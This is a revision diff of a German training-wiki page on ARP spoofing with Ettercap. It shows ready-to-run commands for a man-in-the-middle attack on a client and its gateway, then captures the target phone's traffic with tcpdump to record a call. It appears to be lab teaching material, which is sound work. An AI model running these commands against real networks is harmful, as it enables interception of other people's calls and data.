Arpspoofing mit Ettercap Gateway vorgauckeln: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
Zeile 1: Zeile 1:
=benötigtes Paket=
+
*[[Arpspoofing mit Ettercap Gateway vorgauckeln Grundsätzlich]]
*apt-get install ettercap-graphical
+
*[[Arpspoofing mit Ettercap Gateway vorgauckeln VoIP Traffic Mitschnitt]]
*CLIENT=10.0.10.104
+
Telefongespräch mitschneiden=
*GATEWAY=10.0.10.1
 
*INTERFACE=eth0
 
 
 
=Befehl=
 
*ettercap -i $INTERFACE -Tq -M ARP /$CLIENT// /$GATEWAY//
 
 
 
'''optionen'''
 
-i eth0            =  Interface
 
-T                =  Textmodus
 
-q                =  still
 
-M arp            =  ARP Spoofing
 
 
 
=Telefongespräch mitschneiden=
 
 
==Versuchsaufbau==
 
==Versuchsaufbau==
 
{{#drawio:telefon-gespraech-spoofing}}
 
{{#drawio:telefon-gespraech-spoofing}}

Version vom 18. September 2023, 07:14 Uhr

Telefongespräch mitschneiden=

Versuchsaufbau

Vorgehensweise

  • Wir müssen uns in der selben Broadcastdomain befinden.
  • Wir starten eine Man in the Middle Attacke.
  • Sie wird über Arpspoofing umgesetzt.
  • Der Verkehr zum Telefon von Alice wird, mit tcpdump, komplett mitgeschnitten.
  • Wir werten ihn später mit wireshark aus.

Variablen

  • CLIENT=10.81.31.6
  • GATEWAY=10.81.0.1
  • INTERFACE=enp0s31f6

Attacke

  • ettercap -i $INTERFACE -Tq -M ARP /$CLIENT// /$GATEWAY//

Spoofing

  • sudo tcpdump -ni enp0s31f6 host 10.81.31.6 -s 1500 -w intercept.cap